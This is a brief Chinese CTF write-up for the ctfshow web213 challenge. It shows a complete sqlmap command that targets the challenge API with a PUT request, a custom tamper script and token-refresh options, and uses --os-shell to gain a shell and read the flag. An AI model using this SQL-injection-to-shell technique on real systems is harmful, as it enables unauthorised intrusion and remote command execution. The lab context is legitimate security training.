ctfshow-web213

-os--shell参数的使用

复制代码
python sqlmap.py -u "http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/index.php" --method="PUT" --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=1vrv4fg7q4uid8i1lhma043h20" --safe-url="http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web212.py --os-shell

有两个地方需要进行选择:如果是PHP则直接回车默认选择。

这两个地方需要选择正确才能拿到shell。

读取flag。

相关推荐
道法自然|~1 天前
【建站】网站使用天地图
html·web·js
小肖爱笑不爱笑2 天前
JavaScript
java·javascript·json·web
深海的鲸同学 luvi2 天前
什么是 NexServer 共处数据
web·harmonyos sdk
小阿宁的猫猫2 天前
文件上传和解析漏洞的原理、条件、比赛时的各种绕过方法
web安全·网络安全·web
敲敲了个代码3 天前
隐式类型转换:哈基米 == 猫 ? true :false
开发语言·前端·javascript·学习·面试·web
llxxyy卢3 天前
逻辑越权之水平垂直越权
web安全·web
sg_knight3 天前
拥抱未来:ECMAScript Modules (ESM) 深度解析
开发语言·前端·javascript·vue·ecmascript·web·esm
冰敷逆向3 天前
苏宁滑块VMP深入剖析(一):解混淆篇
javascript·爬虫·安全·web
闲人编程3 天前
健康检查与就绪探针
kubernetes·web·状态机·健康检查·codecapsule·存活探针·启动探针